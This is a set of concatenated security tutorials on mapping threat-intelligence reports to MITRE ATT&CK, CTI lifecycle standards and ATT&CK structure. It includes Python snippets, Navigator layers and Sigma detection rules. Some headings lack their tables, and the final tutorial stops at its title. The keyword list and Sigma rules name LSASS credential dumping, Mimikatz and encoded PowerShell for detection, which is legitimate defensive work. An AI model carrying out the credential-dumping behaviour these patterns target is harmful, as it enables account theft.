Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology

Objective: Learn to parse a real-world cyber threat intelligence (CTI) report and systematically translate its narrative behaviors into precise MITRE ATT&CK tactics, techniques, and sub-techniques — producing an accurate, reusable TTP layer that drives detection engineering, threat hunting, and adversary emulation planning.

1. Why TTP Mapping Matters More Than IOCs

Traditional Indicators of Compromise (IOCs) — hashes, IP addresses, domains — are brittle. An adversary rotates infrastructure and recompiles payloads cheaply, so a hash-based detection expires the moment the campaign moves. Tactics, Techniques, and Procedures (TTPs) describe behavior, which is far costlier for an adversary to change. Re-tooling how you dump LSASS or beacon over HTTPS is expensive; swapping a C2 IP is trivial.

MITRE ATT&CK encodes this behavioral layer into a shared vocabulary. When you map a CTI report to ATT&CK, you convert prose (“the actor ran an encoded PowerShell loader”) into a stable, machine-referenceable identifier (T1059.001) that every tool, team, and report understands. That identifier outlives the campaign and feeds detection, hunting, and emulation directly.

2. ATT&CK Architecture: Tactics, Techniques, Sub-techniques, and Procedures

ATT&CK is a knowledge base of adversary behavior built on three structural levels.

A procedure is the real-world, in-the-wild instance of a technique — the exact way a named group performed it. Procedures appear on each technique page as cited examples.

The 14 Enterprise Tactics

Technique IDs follow the T#### convention; sub-techniques append .### (e.g., T1021, T1059.003). These identifiers standardize communication across detection engineering, intelligence reporting, and red team planning. ATT&CK is versioned — IDs can be deprecated or renumbered across major releases — so always verify against the live matrix at attack.mitre.org.

3. Sourcing and Preparing a CTI Report for Analysis

CTI arrives at three altitudes. Strategic intelligence describes who and why at a board level. Operational intelligence describes campaign-level capability and intent. Tactical intelligence — vendor incident reports, CISA advisories, ISAC bulletins, OSINT write-ups — describes the granular actions you can actually map.

A report is mappable when it describes what the adversary did, not just what it was. Strip attribution bias: the goal is behavior, not a flag. Before mapping, read the full report once end-to-end, then segment the narrative into discrete adversary actions. Each action is a candidate for one or more ATT&CK techniques.

4. The Four-Step Mapping Methodology

CISA’s Best Practices for MITRE ATT&CK Mapping defines a canonical four-step loop. Run it once per behavior.

1. Identify the behavior — extract what the adversary did from the narrative, quoting the source verbatim.
2. Research the behavior — understand the technical action being described; resolve vendor jargon to a concrete mechanism.
3. Translate the behavior into a tactic — identify the adversary’s goal (the why).
4. Identify the technique and sub-technique — match the how against the matrix.

Worked example. Take the narrative: “The actor delivered a spearphishing attachment, then executed an obfuscated PowerShell loader and accessed LSASS memory with a renamed procdump binary.”

Automation helps the first pass. The script below surfaces candidate tactics from raw text — a triage aid, never a final answer.

# First-pass triage only — surfaces CANDIDATE tactics for manual review.
TACTIC_KEYWORDS = {
    "TA0001": ["phishing", "spearphishing", "supply chain", "exploited public"],
    "TA0002": ["powershell", "executed", "ran script", "command interpreter"],
    "TA0005": ["obfuscated", "base64", "encoded", "disabled logging"],
    "TA0006": ["lsass", "credential", "dumped", "mimikatz"],
    "TA0011": ["beacon", "c2", "https post", "command and control"],
}

def candidate_tactics(report_text: str):
    text = report_text.lower()
    return {ta: [w for w in words if w in text]
            for ta, words in TACTIC_KEYWORDS.items()
            if any(w in text for w in words)}

excerpt = ("The actor used a spearphishing attachment, then ran an "
           "obfuscated PowerShell loader and dumped LSASS memory.")
for ta, words in candidate_tactics(excerpt).items():
    print(ta, "->", words)

If a sub-technique is not easily identifiable — and there may not be one in every case — review the procedure examples on the technique page. They link the source CTI reports behind the original mapping and may affirm your choice or suggest an alternative. There is always a possibility a behavior is a new technique not yet covered in ATT&CK.

5. Disambiguation: Choosing the Right Technique When Multiple Apply

Ambiguity is the hard part. One behavior frequently maps to several tactics. T1078 Valid Accounts spans Initial Access (TA0001), Persistence (TA0003), Privilege Escalation (TA0004), and Defense Evasion (TA0005) — the correct tactic depends on what the account was used for in that step, not the account itself.

Rules of thumb:

• Map to the tactic that matches the adversary’s goal at that moment, not every goal the technique can serve.
• Prefer the technique level when the report lacks the detail to justify a sub-technique. Forcing T1003.001 when the report only says “stole credentials” is over-mapping.
• Use the procedure examples to calibrate. If your behavior reads nothing like the cited procedures, re-investigate.
• T1218 System Binary Proxy Execution and T1027 Obfuscated Files or Information often co-occur with execution techniques — record them as distinct Defense Evasion entries rather than collapsing them.

6. The Analyst Mapping Worksheet

The core analyst deliverable is a worksheet that preserves the audit trail from quote to ID. Confidence and rationale columns make the mapping reviewable.

This worksheet becomes the source of truth that all downstream artifacts — Navigator layers, Sigma rules, emulation plans — derive from.

7. Tooling: ATT&CK Navigator, Decider, and the STIX/TAXII API

ATT&CK Navigator is MITRE’s web tool for visually annotating the matrix. You represent a mapped TTP set as a versioned layer JSON — a portable, diff-able artifact you commit to version control.

{
  "name": "APT-Sample CTI Mapping",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "description": "TTPs extracted from CTI report; scored by confidence.",
  "techniques": [
    { "techniqueID": "T1566.001", "score": 100, "color": "#e60d0d",
      "comment": "Spearphishing attachment delivered loader (High)" },
    { "techniqueID": "T1059.001", "score": 100, "color": "#e60d0d",
      "comment": "Obfuscated PowerShell stager (High)" },
    { "techniqueID": "T1003.001", "score": 75, "color": "#e68a0d",
      "comment": "LSASS access via renamed procdump (Medium)" }
  ]
}

CISA Decider eases disambiguation by asking a series of guided questions about adversary activity, walking you to the correct tactic, technique, or sub-technique — invaluable when an analyst is uncertain.

For programmatic work, query the public read-only TAXII 2.1 endpoint (https://attack-taxii.mitre.org/, Enterprise collection x-mitre-collection--1f5f1533-f617-4ca8-9ab4-6a02367fa019). The ATT&CK dataset is STIX 2.1 JSON: techniques are attack-pattern objects, groups are intrusion-set, software is malware / tool. Pull techniques attributed to a group to cross-check your mapping against MITRE’s own group profile.

from mitreattack.stix20 import MitreAttackData

# Load the Enterprise STIX 2.1 bundle (download once from attack-stix-data)
attack = MitreAttackData("enterprise-attack.json")

# Resolve a threat group alias to its intrusion-set object
group = attack.get_groups_by_alias("APT29")[0]

# Enumerate every technique attributed to the group
for t in attack.get_techniques_used_by_group(group["id"]):
    obj = t["object"]
    print(attack.get_attack_id(obj["id"]), "\t", obj["name"])

8. From TTP Map to Adversary Profile

Aggregate worksheets across an entire campaign to build an adversary profile. Correlate your mapped techniques against the relevant ATT&CK Groups page to validate consistency and surface techniques the actor is known to use but the report omitted. Score the aggregated layer by frequency or confidence to produce a TTP heat map, then prioritize against your priority intelligence requirements (PIRs). The heat map feeds directly into detection gap analysis.

import csv, json

# Load the mapped TTP layer and the internal detection inventory
layer = json.load(open("cti_layer.json"))
covered = set()
with open("detection_coverage.csv") as fh:            # cols: technique_id, rule_name
    for row in csv.DictReader(fh):
        covered.add(row["technique_id"])

print("TechniqueID\tCovered")
for t in layer["techniques"]:
    tid = t["techniqueID"]
    print(f"{tid}\t{tid in covered}")

9. Quality Assurance: Peer Review and Common Mapping Errors

A formal peer review of an annotated report shares perspectives, promotes learning, and improves accuracy. A second analyst routinely catches TTPs missed in the first pass and enforces mapping consistency across the team.

Watch for these recurring errors:

• Over-mapping — assigning techniques the report does not support.
• Under-mapping — missing key behaviors buried in the narrative.
• Conflating technique with tactic — recording a goal where a behavior belongs.
• Misidentifying sub-techniques — forcing .### granularity the source lacks.
• Mapping to deprecated techniques — always validate against the current ATT&CK version.

10. Common Attacker Techniques in CTI Reports

These behaviors dominate tactical CTI and should be in every analyst’s recognition vocabulary.

11. Defensive Strategies & Detection

The output of mapping is a prioritized list of behaviors to detect. Each ATT&CK technique page lists Data Sources (e.g., DS0009 Process, DS0011 Module, DS0017 Command, DS0022 File, DS0028 Logon Session, DS0029 Network Traffic) and Mitigations (e.g., M1038 Execution Prevention, M1026 Privileged Account Management). Pull these per technique to convert the map into telemetry requirements and hardening tasks.

Sysmon Events Tied to Mapped Behaviors

Enable the supporting Windows audit policies: Audit Process Creation (Event ID 4688 with command line), Audit Logon Events (4624/4625/4648 for T1078), Audit Object Access → SAM (4661 for T1003), and PowerShell Script Block Logging (4104 for T1059.001).

A Sigma rule operationalizes one mapped technique. Tags follow attack.t1003_001 (lowercase, underscore for the sub-technique separator) and attack.ta0006 for the tactic.

title: Cross-Process Access to LSASS Memory
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess: '0x1410'
  condition: selection
tags:
  - attack.t1003_001
  - attack.ta0006
level: high

Feed the completed layer into DeTT&CT (Detect Tactics, Techniques & Combat Threats) to align mapped TTPs against your data source visibility and detection coverage — the natural follow-on to mapping. The same layer drives the red team emulation plan, ensuring offensive testing exercises the exact behaviors the CTI reported.

12. Tools for CTI Mapping Analysis

13. MITRE ATT&CK Mapping Reference

Summary

• CTI-to-ATT&CK mapping converts perishable IOCs into durable, behavioral TTPs that survive across campaigns and standardize defensive communication.
• ATT&CK is structured as tactics (the why), techniques (the how), and sub-techniques (granular methods), each with stable TA#### / T####.### identifiers.
• The CISA four-step loop — identify, research, translate to tactic, identify technique — produces an auditable mapping worksheet that anchors every downstream artifact.
• Navigator layers, CISA Decider, and the public TAXII 2.1 STIX endpoint operationalize and version-control the mapping; peer review guards against over-mapping, under-mapping, and tactic/technique confusion.
• The finished TTP map drives detection engineering directly — pulling ATT&CK Data Sources, Sysmon Event IDs, audit policies, and Sigma rules per technique, and feeding DeTT&CT coverage analysis and emulation plans.

Related Tutorials

• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers
• Introduction to MITRE ATT&CK: Structure, Tactics, Techniques, and Sub-Techniques
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Passive OSINT: Mapping the Target Without Touching It

References

• Best Practices for MITRE ATT&CK® Mapping (CISA)
• MITRE ATT&CK® – Get Started: Threat Intelligence
• MITRE ATT&CK® – Get Started: Adversary Emulation and Red Teaming
• MITRE ATT&CK® – Adversary Emulation Plans
• Getting Started with ATT&CK: Threat Intelligence (Official MITRE ATT&CK® Blog)
• Center for Threat-Informed Defense – Adversary Emulation Library (GitHub)

Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle

Objective: Understand what Cyber Threat Intelligence is, the four intelligence types, the six-phase intelligence lifecycle, primary collection sources, the exchange standards (STIX/TAXII/TLP), and the analytic frameworks — Kill Chain, Diamond Model, Pyramid of Pain, and MITRE ATT&CK — that let defenders and authorized red teamers operationalize intelligence into detection.

1. What Is CTI? (And What It Is Not)

Cyber Threat Intelligence is evidence-based knowledge about adversaries — their capabilities, infrastructure, motivations, and behaviors — refined to support decisions. CTI is not a raw feed of IP addresses, and it is not a SIEM alert. It is the product of a deliberate analytic process.

The distinction is a pipeline:

• Data — discrete, context-free observations (a hash, a domain, a log line).
• Information — data aggregated and given context (a domain resolving to a host serving a known dropper).
• Intelligence — analyzed information answering a stakeholder question (“Is the group behind this dropper targeting our sector, and can our controls detect them?”).

CTI exists to reduce uncertainty for a decision-maker. If a piece of output does not change a defensive action, an investment, or a hunt hypothesis, it is information — not intelligence.

2. The Four Intelligence Types

CTI is stratified by audience and shelf-life. The four-type model (used by NIST SP 800-150 and several vendors) cleanly separates human-consumable TTPs from machine-consumable IOCs.

Trace one actor across all four levels. Strategic: “An espionage group aligned with Nation X is escalating against the energy sector.” Operational: “That group is running a spearphishing campaign against utility OT vendors this quarter.” Tactical: “They use T1566.001 (Spearphishing Attachment) followed by T1059.001 (PowerShell) for execution.” Technical: “The current dropper SHA-256 is e3b0c4... and the C2 domain is cdn-update.example.”

Note the inversion of value and durability: technical IOCs are the most actionable but decay in minutes; strategic intelligence shapes decisions for years.

3. CTI Sources: Where the Data Comes From

CTI is collected across the classic intelligence disciplines, adapted to the cyber domain.

Additional subcategories include measurement-and-signature intelligence, social-media intelligence (SOCMINT), geospatial intelligence (GEOINT), and Deep/Dark Web intelligence.

Sharing communities multiply source value. Sharing anonymized insights with trusted partners — notably Information Sharing and Analysis Centers (ISACs) — helps peers prepare for the same threats. Sector examples include FS-ISAC (financial services), H-ISAC (health), and E-ISAC (electricity). Membership turns one organization’s incident into the whole sector’s early warning.

4. The Intelligence Lifecycle (Six Phases)

The lifecycle is a continuous loop. Output from one cycle refines the inputs of the next.

The feedback loop is what separates an intelligence program from an IOC firehose. If the SOC reports that disseminated intelligence never fired a single detection, the next planning phase re-scopes collection.

Governing standard: NIST SP 800-150 (Guide to Cyber Threat Information Sharing) establishes governance, legal, and technical best practices for inter-organizational sharing. ISO/IEC 27001:2022 Control 5.7 formally requires organizations to collect, analyze, and share relevant threat intelligence — making a documented lifecycle a compliance artifact, not just good hygiene.

5. Intelligence Formats & Sharing Standards

Machine-to-machine sharing requires structure. Four standards govern format, transport, and handling.

STIX models intelligence as graph objects. STIX Domain Objects (SDOs) are the nodes; STIX Relationship Objects (SROs) are the edges.

Building a STIX 2.1 Bundle (Python):

from stix2 import ThreatActor, AttackPattern, Relationship, Bundle

actor = ThreatActor(
    name="Fictitious Bear",
    description="Illustrative espionage group (teaching example)",
    threat_actor_types=["nation-state"],
)

technique = AttackPattern(
    name="Spearphishing Attachment",
    external_references=[{
        "source_name": "mitre-attack",
        "external_id": "T1566.001",   # technique reference
    }],
)

# SRO: actor 'uses' technique
uses = Relationship(actor, "uses", technique)

bundle = Bundle(actor, technique, uses)
print(bundle.serialize(pretty=True))

A minimal STIX 2.1 Indicator (JSON):

{
  "type": "indicator",
  "spec_version": "2.1",
  "id": "indicator--8e2e2d2b-17d4-4cbf-938f-98ee46b3cd3f",
  "created": "2026-01-15T12:00:00.000Z",
  "modified": "2026-01-15T12:00:00.000Z",
  "name": "Dropper file hash (fictitious)",
  "indicator_types": ["malicious-activity"],
  "pattern": "[file:hashes.'SHA-256' = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']",
  "pattern_type": "stix",
  "valid_from": "2026-01-15T12:00:00Z"
}

TLP discipline is operational, not decorative. TLP:RED intelligence must never be imported into a shared SIEM tenant or multi-tenant TIP. TAXII 2.1 collections are pulled over HTTPS with a bearer token (Authorization: Bearer <token>); enforce TLP at ingestion so a marking can never be stripped downstream.

6. Analytic Frameworks: Kill Chain, Diamond Model, Pyramid of Pain

Frameworks impose structure on raw observations. Each answers a different question.

The Lockheed Martin Cyber Kill Chain (Hutchins et al., 2011) models an intrusion as seven sequential phases: Reconnaissance → Weaponization → Delivery → Exploitation → Installation → Command & Control → Actions on Objectives. Use it to check coverage balance — an adversary who evades detection at Delivery should still trip a control at C2.

The Diamond Model of Intrusion Analysis (Caltagirone, Pendergast, Betz — articulated 2006, published 2013) conceptualizes any event as relationships between four vertices: Adversary, Capability, Infrastructure, Victim. It is predictive: known three vertices often imply the fourth.

The Pyramid of Pain (David Bianco, 2013) ranks indicators by how much pain their loss causes the adversary:

                    /\
                   /  \   TTPs ............... hardest to change (apex)
                  /----\
                 / Tools \  Cobalt Strike, Mimikatz, malware families
                /--------\
               / Network &  \  JA3, URI patterns, registry keys, named pipes
              /  Host Artifacts\
             /------------------\
            /   Domain Names      \  trivial to rotate
           /----------------------\
          /  IP Addresses           \  trivial to rotate
         /--------------------------\
        /   Hash Values               \  changed in seconds (base)
       /------------------------------\

Hashes and IPs sit at the base — trivial detection value, replaced in seconds. TTPs occupy the apex: forcing an adversary to abandon PowerShell-based execution or spearphishing imposes real engineering cost. This is the strategic argument for behavior-based detection.

7. MITRE ATT&CK as a CTI Backbone

MITRE ATT&CK is a globally accessible knowledge base of adversary behaviors built from real-world observation. Unlike IOC-centric models, it focuses on TTPs — a behavioral approach. Every technique carries a stable ID such as T1021 or T1059.003, giving detection engineering, reporting, and red-team planning a shared vocabulary.

Key ATT&CK objects in CTI workflows:

• Groups (intrusion-set) — e.g., APT29 (G0016), APT41 (G0096), Lazarus Group (G0032)
• Software (malware/tool) — e.g., Cobalt Strike (S0154), Mimikatz (S0002)
• Campaigns (campaign) — e.g., C0017, C0018
• Techniques — e.g., T1566 (Phishing), T1071.001 (Web Protocols C2), T1003 (OS Credential Dumping)

ATT&CK ships as STIX, so it is programmatically queryable. Enumerate every technique attributed to a group:

from mitreattack.stix20 import MitreAttackData

attack = MitreAttackData("enterprise-attack.json")
group = attack.get_groups_by_alias("APT29")[0]
techniques = attack.get_techniques_used_by_group(group.id)

for t in techniques:
    tech = t["object"]
    tid = tech.external_references[0].external_id
    print(f"{tid}\t{tech.name}")

Feed the resulting technique list into ATT&CK Navigator to build a heat-map. Overlay your detection coverage against the group’s TTPs and the gaps become your next intelligence requirements.

8. From Intelligence to Detection: Operationalizing CTI

Intelligence that never reaches a sensor is wasted. The pipeline is: ATT&CK technique → detection hypothesis → log source → detection rule.

Take T1059.001 (PowerShell). Hypothesis: encoded command execution is rare in this environment and worth alerting. Log source: PowerShell Script Block Logging (Event ID 4104). Rule:

title: Suspicious PowerShell Encoded Command Execution
id: 6e8a1f3c-2b7d-4f9a-9c1e-0a2b3c4d5e6f
status: experimental
logsource:
  product: windows
  service: powershell
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - '-enc '
      - 'FromBase64String'
  condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059.001

Every Sigma rule tied to a technique is a step up the Pyramid of Pain. The tags field (attack.<tactic>, attack.t<technique>) keeps each rule linked to the framework, so coverage roll-up is automatic.

Invest accordingly: spend disposable effort on IOC matching (high churn, low pain to adversary) and durable engineering effort on TTP detections (low churn, high pain). STIX/TAXII feeds drive SIEM/SOAR enrichment so analysts triage against context instead of researching every artifact by hand.

9. CTI for Red Teams and Defenders: Two Sides of the Same Brief

Adversary emulation is CTI consumed offensively. A red team ingests a finished report on “Fictitious Bear,” extracts the ATT&CK technique set, and emulates only those TTPs to validate whether controls fire. The blue team consumes the identical brief to confirm the same detections exist. One brief, two scopes, one shared technique vocabulary.

Scope is a legal control, not a courtesy. Emulation must stay inside an authorized rules-of-engagement document. Respect TLP on the source intelligence: a TLP:AMBER report informs an internal exercise but cannot be republished in a public write-up.

10. Common Attacker Techniques

Adversaries run their own intelligence cycle against you. CTI teams must practice counter-intelligence awareness.

Counter-intelligence implication: assume your public footprint (and your IOC feeds) are adversary collection targets. Watch for reconnaissance against your own brand and credentials.

11. Defensive Strategies & Detection

CTI is itself a defensive discipline. Operationalize feeds against host and network telemetry.

Sysmon Event IDs for IOC operationalization:

ETW providers for TTP-level hunting: Microsoft-Windows-DNS-Client (domain IOC matching), Microsoft-Windows-PowerShell/Operational (T1059.001), and Microsoft-Windows-Sysmon/Operational (broad process/network/file telemetry).

Audit policy: enable Audit Process Creation (Success) for process-IOC correlation, and turn on PowerShell Script Block Logging via GPO for behavioral visibility.

A Sigma rule matching a CTI-sourced malicious domain against DNS telemetry:

title: DNS Query to CTI-Listed Malicious Domain
id: 1f2a3b4c-5d6e-7f80-91a2-b3c4d5e6f708
status: experimental
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 22
    QueryName|endswith:
      - 'cdn-update.example'    # fictitious C2 domain
  condition: selection
level: high
tags:
  - attack.command_and_control
  - attack.t1071.001

Program controls: enforce TLP at ingestion in the TIP; gate raw IOC feeds behind de-duplication and decay scoring before SIEM import; run an intelligence-requirement review tied to ATT&CK Navigator coverage gaps; and use the Kill Chain quarterly to check detection balance across the attack lifecycle.

12. Tools for CTI Analysis

13. MITRE ATT&CK Mapping

14. Summary

• CTI is analyzed, decision-ready knowledge about adversaries — not a raw IOC feed — produced by a disciplined six-phase lifecycle.
• The four intelligence types (strategic, operational, tactical, technical) trade durability against immediacy; technical IOCs decay in minutes while strategic intelligence endures for years.
• STIX 2.1, TAXII 2.1, and TLP standardize how intelligence is represented, exchanged, and handled — enforce TLP at ingestion so TLP:RED never leaks downstream.
• The Diamond Model, Kill Chain, Pyramid of Pain, and MITRE ATT&CK interlock; TTP-level intelligence at the pyramid apex outlasts IOC-level intelligence at its base.
• Operationalize CTI by converting ATT&CK techniques into Sigma rules and matching IOC feeds against Sysmon EventID 1/3/7/22, closing the loop with stakeholder feedback.

Related Tutorials

• Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology
• Red Teaming Fundamentals: Mindset, Methodology, and Engagement Types
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers

References

• MITRE ATT&CK® – Adversary Emulation Plans
• MITRE ATT&CK® – Get Started: Threat Intelligence
• MITRE ATT&CK® for Cyber Threat Intelligence (CTI) Training
• NIST SP 800-150 – Guide to Cyber Threat Information Sharing
• CISA – Service Models for Cyber Threat Intelligence (White Paper)
• CISA – Cyber Threat Information Sharing (CTIS) – Shared Cybersecurity Services

Introduction to MITRE ATT&CK: Structure, Tactics, Techniques, and Sub-Techniques

Objective: Understand what the MITRE ATT&CK knowledge base is, how it is structured — domains, matrices, tactics, techniques, sub-techniques, and procedures — and how defenders, threat hunters, and authorized red teamers use it as a shared operational language for threat-informed defense and adversary emulation.

1. What Is MITRE ATT&CK and Why It Matters

MITRE ATT&CK is a living, open-source knowledge base that documents real-world adversary tactics, techniques, and procedures (TTPs). It was created by the MITRE Corporation and first released in 2013. ATT&CK focuses on how attackers behave — the actions they take inside an environment — rather than on the indicators of compromise (IOCs) they leave behind.

This distinction matters. IOCs (hashes, IPs, domains) are brittle and disposable; an adversary rotates them cheaply. Behaviors — injecting code, dumping credentials, abusing valid accounts — are expensive to change. ATT&CK catalogs the durable behaviors, grounded in empirical evidence from intrusions observed across industries and geographies.

ATT&CK builds on the Lockheed Martin Cyber Kill Chain (Hutchins, Cloppert & Amin, 2011). The Matrix columns are ordered roughly along the chronological flow of an intrusion, but ATT&CK goes deeper, enumerating concrete mechanisms under each phase rather than naming abstract stages.

2. The Three Domains: Enterprise, Mobile, and ICS

ATT&CK is partitioned into three domains, each with its own matrices.

This site focuses on Enterprise ATT&CK because it covers the Windows, Linux, and cloud surfaces most relevant to blue teams, DFIR, and authorized red teaming.

3. Tactics, Techniques, Sub-Techniques, and Procedures

The ATT&CK data model is a four-level hierarchy. Each level answers a different question.

Tactics represent the “why.” Techniques represent the “how.” Sub-techniques describe a narrower variation. For example, the technique Account Manipulation (T1098) encompasses sub-techniques such as Additional Email Delegate Permissions (T1098.002) and Exchange Email Delegate Permissions (T1098.003), each detailing a distinct method.

Procedures are the real-world implementations — specific tools, malware families, or hands-on-keyboard methods observed in active campaigns. This is what makes ATT&CK actionable: you can study the actual tradecraft, not just the abstraction.

4. Walking the Enterprise Matrix: The 14 Tactics

The Matrix column headings are the tactics, presented in roughly chronological order. The cells under each column are the techniques that achieve that tactical objective. The baseline below reflects ATT&CK v16.1 (14 tactics, 203 techniques, 453 sub-techniques). For reference, v18 lists 14 tactics, 216 techniques, 475 sub-techniques, 44 mitigations, and over 1,700 analytics. Always pin counts to a version.

v19 note (April 2026): ATT&CK v19 introduced a major structural change — the Defense Evasion tactic (TA0005) was split into two new tactics, Stealth and Defense Impairment. TA0005 is deprecated in the current release. Retrieve the exact new tactic IDs and transition guidance from attack.mitre.org/resources/updates/ before mapping against v19.

5. Anatomy of a Technique Page

Every technique page is a structured record. Take T1059.001 — PowerShell (a sub-technique of T1059 Command and Scripting Interpreter, under Execution).

A technique can belong to multiple tactics. The Detection section lists data source / data component pairs, free-text analytic notes, and — since v14 — structured pseudocode analytics from the MITRE Cyber Analytics Repository (CAR). These data-source fields tell you exactly which telemetry to collect.

6. Related Objects: Groups, Software, Campaigns, and Mitigations

ATT&CK is more than a list of behaviors. A graph of related objects ties techniques to threat intelligence.

This turns the Matrix into an operational tool: not just “T1056.001 exists,” but which group uses it, with what software, in which campaign, and which mitigations apply. The Group pages are the entry point for threat-actor-centric research and emulation planning.

7. Programmatic Access via STIX and the ATT&CK Python Library

ATT&CK is published as STIX 2.1 — the structured threat intelligence format from the OASIS CTI Technical Committee. In STIX, an intrusion-set object (Group) links to attack-pattern objects (techniques/sub-techniques), malware and tool objects (software), and campaign objects. MITRE distributes the bundles on GitHub.

The canonical library is mitreattack-python (github.com/mitre-attack/mitreattack-python). Load a bundle and query the data model directly.

from mitreattack.stix2 import MitreAttackData

mitre = MitreAttackData("enterprise-attack.json")

# List every technique under the Persistence tactic (TA0003)
for t in mitre.get_techniques_by_tactic("persistence", "enterprise-attack"):
    print(mitre.get_attack_id(t.id), t.name)

Fetch a single technique by its ATT&CK ID and inspect the schema fields:

tech = mitre.get_object_by_attack_id("T1059.001", "attack-pattern")
print(tech.name)                 # PowerShell
print(tech.x_mitre_platforms)    # ['Windows']
for phase in tech.kill_chain_phases:
    print(phase.phase_name)      # execution

Walk the relationship graph to list every Group observed using a technique:

for g in mitre.get_groups_using_technique(tech.id):
    grp = g["object"]
    print(mitre.get_attack_id(grp.id), grp.name, grp.aliases)

The raw attack-pattern object behind that technique looks like this (trimmed and annotated):

{
  "type": "attack-pattern",
  "id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
  "name": "PowerShell",
  "x_mitre_platforms": ["Windows"],
  "x_mitre_is_subtechnique": true,
  "kill_chain_phases": [
    { "kill_chain_name": "mitre-attack", "phase_name": "execution" }
  ],
  "external_references": [
    {
      "source_name": "mitre-attack",
      "external_id": "T1059.001",
      "url": "https://attack.mitre.org/techniques/T1059/001"
    }
  ]
}

To stay current across releases, diff two STIX bundles to surface added or modified techniques:

# Illustrative: compare two domain bundles and emit a change report
from mitreattack.diffStix.changelog_helper import get_new_changelog_md

get_new_changelog_md(
    old="enterprise-attack-16.1.json",
    new="enterprise-attack-18.0.json",
    domains=["enterprise-attack"],
    markdown_file="attack-v16-to-v18-changes.md",
)

8. The ATT&CK Navigator and Coverage Layers

The ATT&CK Navigator renders the Matrix as an interactive heat map. You assign scores and colors to techniques to build layers — coverage maps for detection engineering, gap analysis, and emulation scoping. Layers are JSON and version-controllable.

{
  "name": "Detection Coverage - Execution & Persistence",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1059.001", "score": 100, "color": "#31a354",
      "comment": "Sysmon EID 1 + Script Block Logging" },
    { "techniqueID": "T1547.001", "score": 50, "color": "#fee08b",
      "comment": "Partial registry telemetry" },
    { "techniqueID": "T1055", "score": 0, "color": "#de2d26",
      "comment": "No process-injection detection" }
  ]
}

Overlay an adversary’s known techniques (red) against your detection coverage (green) and the white space is your gap list.

9. Applying ATT&CK in Defense and Authorized Emulation

As a defender, map every SIEM alert and detection rule to a technique ID. Build Navigator layers to measure coverage, then prioritize engineering against the techniques most relevant to your threat model — threat-informed defense instead of blanket coverage.

As an authorized red teamer / adversary emulator, pull a Group page (e.g., a relevant APT), extract its technique set, and build a TTP-driven emulation plan. This is fundamentally different from vulnerability-based scoping: you exercise the behaviors the defense must catch. Tools like MITRE CALDERA and Atomic Red Team chain ATT&CK-mapped tests so blue and red teams speak the same IDs.

10. Common Attacker Techniques

The framework catalogs thousands of behaviors. A handful illustrate the model’s range and the important fact that one technique can serve multiple tactics.

T1078 (Valid Accounts) is the teaching case: it appears under four tactics — Initial Access, Persistence, Privilege Escalation, and Defense Evasion — because the same behavior serves different adversary goals depending on context.

11. Defensive Strategies & Detection

Because ATT&CK is structural, the goal here is wiring it into your detection workflow. Each technique page lists Data Sources (e.g., Process, Command, Windows Registry, Network Traffic) and Data Components (e.g., Process Creation, Network Connection Creation). These map directly to telemetry you must collect.

On Windows, Sysmon supplies much of that telemetry.

Sigma is the vendor-neutral detection format that carries ATT&CK IDs in its tags block, letting every rule trace back to a technique and tactic.

title: PowerShell EncodedCommand Execution
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
  condition: selection
tags:
  - attack.execution        # tactic name (lowercase)
  - attack.t1059.001        # sub-technique ID (lowercase)
level: medium

Mitigations use M#### IDs (verify against attack.mitre.org/mitigations/enterprise/ before citing in production):

12. Tools for ATT&CK Analysis

13. MITRE ATT&CK Mapping

Every other tutorial on this site closes with a mapping table. Read it as technique → tactic → context. This is the worked example.

14. Summary

• MITRE ATT&CK is a behavior-based, empirically grounded knowledge base of adversary TTPs — not an IOC feed.
• The data model is a hierarchy: tactics (why, TA####) → techniques (how, T####) → sub-techniques (T####.###) → procedures (real-world instances).
• Related objects — Groups (G####), Software (S####), Campaigns (C####), Mitigations (M####) — turn the Matrix into an operational, intelligence-led tool.
• Pin counts and structure to a specific version; v19 (April 2026) split Defense Evasion (TA0005) into Stealth and Defense Impairment — confirm the new IDs at attack.mitre.org/resources/updates/.
• Operationalize ATT&CK by mapping data sources to Sysmon telemetry, tagging Sigma rules with technique IDs, and tracking coverage in Navigator layers for both detection engineering and authorized emulation.

Related Tutorials

• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle

References

• MITRE ATT&CK® – Getting Started (Official Resources Overview)
• Enterprise Tactics – MITRE ATT&CK®
• Enterprise Techniques – MITRE ATT&CK®
• Adversary Emulation Plans – MITRE ATT&CK®
• ATT&CK Adversary Emulation & Red Teaming – MITRE ATT&CK® Get Started
• MITRE ATT&CK: Design and Philosophy (Official PDF – Strom et al.)

Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle

